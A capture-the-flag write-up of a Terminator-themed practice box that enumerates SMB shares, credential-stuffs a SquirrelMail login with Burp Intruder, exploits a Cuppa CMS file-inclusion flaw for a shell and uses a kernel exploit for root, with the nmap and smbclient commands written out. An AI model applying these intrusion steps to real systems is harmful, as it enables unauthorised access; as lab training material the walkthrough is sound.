A new, mysterious box. It is Terminator themed, but I have no idea what it will reveal Let’s dive in!
Not much recon here. Contrary to our previous targets which were “training boxes”, this one is doesn’t hold your hand. Let’s directly enumerate it!
nmap scan :
sudo nmap -T4 -A -p- -oA scan $target_ip
| smb-os-discovery: | OS: Windows 6.1 (Samba 4.3.11-Ubuntu) | Computer name: skynet | NetBIOS computer name: SKYNET\x00 | Domain name: \x00 | FQDN: skynet |_ System time: 2021-02-27T02:05:39-06:00 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2021-02-27T08:05:39 |_ start_date: N/A TRACEROUTE (using port 995/tcp) HOP RTT ADDRESS 1 31.41 ms 10.11.0.1 2 31.82 ms 10.10.223.240 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Sat Feb 27 09:05:36 2021 -- 1 IP address (1 host up) scanned in 51.35 seconds
we find the following
Samba shares :
Enumerating them further will reveal juicy info inside
anonymous such as passwords' list and a message telling us that all employees are required to change their passwords.
gobuster will reveal a
SquirrelMail version 1.4.23 [SVN] installation :
Burp, we’ll try some credentials stuffing in order to login. From our first SMB recon, we discovered a plausible user :
milesdyson, and a list of passwords.
In the intruder’s tab set up a
sniper attack, using
milesdyson as user and the password field as the only payload :
We, now, load the password list found during SMB enumeration :
And finally, we add a “grep condition” in order to filter our results :
After a little while, we find a working set of credentials:
and we are in Miles' mailbox !
Now, reading Miles' email, we’ll find a password for Samba :
We can now use it in order to connect to the Samba share, like so :
smbclient \\\\$target_ip\\milesdyson -U milesdyson
Exploring the share will reveal an odd file called
important.txt. Inside this file, we learn the existence of new
CMS located at :
Further scanning reveals admin page :
Doing a quick search, we’ll find the
Cuppa CMS is vulnerable to RFI/LFI.
Getting Initial Shell
We craft the URL to match our target, replacing
administrator, set up a
listener and get initial shell :
user's flag in
milesdyson’s home folder :
We download our classic tools to the box and launch them. Unfortunately here, I didn’t find anything obvious. I tried a few probable exploits, such as
dirtyc0w, and a few others, but nothing worked.
Finally, I paid closer attention to kernel version, and noticed that
4.8.0-58-generic might be vulnerable.
After a few quick steps of download, compile, “send” to target, I was ready to run it, and BOOM! it worked:
Finally, we collect
root's flag :
Another box rooted, it seems that even the inventor of neural-net processor can’t resist us! :)